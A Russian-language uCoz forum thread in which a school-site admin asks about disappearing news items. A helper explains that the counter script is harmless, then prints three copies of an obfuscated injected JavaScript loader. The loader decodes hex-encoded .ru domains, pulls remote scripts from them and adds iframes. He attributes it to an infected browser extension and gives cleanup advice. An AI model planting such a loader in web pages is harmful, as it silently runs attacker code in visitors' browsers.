>
Категории вопросов
Задать вопрос +

Основное

Контент-модули

Продвижение сайта

Управление сайтом

Доп. модули

Вебмастеру

Похожие вопросы



Где в коде сайта искать вирусный фрагмент?

голоса: 0

Сайт школы, сегодня пропали новости с главной страницы. В панели управления все материалы на месте, через календарь просмотреть можно. Просмотрела код главной страницы, нашла такой скрипт:

 

<script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;noadsru?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script>

перерыла все в ПУ, не найду... Собсно, вопросов два: действительно ли это вирусный код, и где его найти чтобы удалить?

Адрес сайта http://lozzosh7.ucoz.ru/
| Автор: | Категория: Безопасность сайта
вижу, проблема решена
| Автор:
Жека Знахарев,
не решена, секретарь школы удалила последнюю новость, остальные появились. Странно...
| Автор:
Оксана Дяченко,
добавьте новость снова, нужно видеть проблему и после давать уже советы по ее решению, тот код что выше, это скрипт для статистики лайв интернет, это не есть вирус
| Автор:
Yuri_Geruk,
Новость добавила, ситуация повторилась - видна только последняя и предідущая, но уже без нижней строки с датой и именем автора.

 

За пояснение по коду спасибо
| Автор:

Ответов: 1

голоса: 0
 
Лучший ответ

Отредактируйте материал - http://lozzosh7.ucoz.ru/news/oblasna_konferencija_m_kharkiv_moja_batkivshhina_ukrajina/2015-11-24-283

далее нажав в редакторе на кнопку Источник ищем следующий код:

<script>window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([&#92;.$?*|{}&#92;(&#92;)&#92;[&#92;]&#92;&#92;&#92;/&#92;+^])/g,"&#92;&#92;$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[&#92;S&#92;s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "lozzosh7.ucoz.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script><iframe id="a1996667054" src="//cu7nitt9.ru/f.html" ></iframe>

после ниже находим код:

<script>window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([&#92;.$?*|{}&#92;(&#92;)&#92;[&#92;]&#92;&#92;&#92;/&#92;+^])/g,"&#92;&#92;$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[&#92;S&#92;s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "lozzosh7.ucoz.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script><iframe id="a1996667054" src="//fmzxu5pt2x7j.ru/f.html" ></iframe>

удаляем этот вредоносный скрипт вставку.

| Автор:
Выбор ответа лучшим | | Автор: Оксана Дяченко

Далее ниже находим третью часть данного скрипта:

<script>window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([&#92;.$?*|{}&#92;(&#92;)&#92;[&#92;]&#92;&#92;&#92;/&#92;+^])/g,"&#92;&#92;$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[&#92;S&#92;s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "lozzosh7.ucoz.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script><iframe id="a1996667054" src="//fmzxu5pt2x7j.ru/f.html" ></iframe>

У вас возможно есть вопрос, что это за скрипт и откуда.

На вашем сайте в новостях появляются лишние коды из-за браузера, который у вас заражен. Браузер в визуальной или HTML среде вбивает в код свою вредоносную часть кода.

Таким образом сохраняя новость после правки или добавления, вы сохраняете вредоносную часть подбитую вашим браузером.. Лечим компьютер и браузер. На будущее не ставим расширения на браузер, особенно если это хром. Если устанавливаете ПО на компьютер, внимательно следите что это ПО устанавливает в довесок. Не пользуйтесь плеерами для просмотра онлайн телевидения или фильмов

Советовал бы вообще удалить браузер, очистить мусор для этого имеется приложение с названием CCleaner качаем и чистим, после переустанавливаем браузер.

Дополнительно советовал бы проверить компьютер на признак заражения просканировав на вирусы.

| Автор:
Спасибо, помогло. Пойду к секретарше убивать браузер (яндекс, на основе хрома)
| Автор:
Оксана Дяченко,
так же стоит проверить список установленных расширений, возможно имеются установленные дополнительные которые и несут эту зараженную часть добавляя на сайт, в общем проделайте все как я писал выше и расширения так же проверьте
| Автор:
Yuri_Geruk,
ок, так и сделаем, спасибо. Чешутся руки кого-нибудь убить :( Только сегодня с того компа удалила пол-сотни вирусов, штук пять левых программ каких-то, а она сидит глазами хлопает, мол, я ничего такого не делала. Блондинка >(
| Автор:
...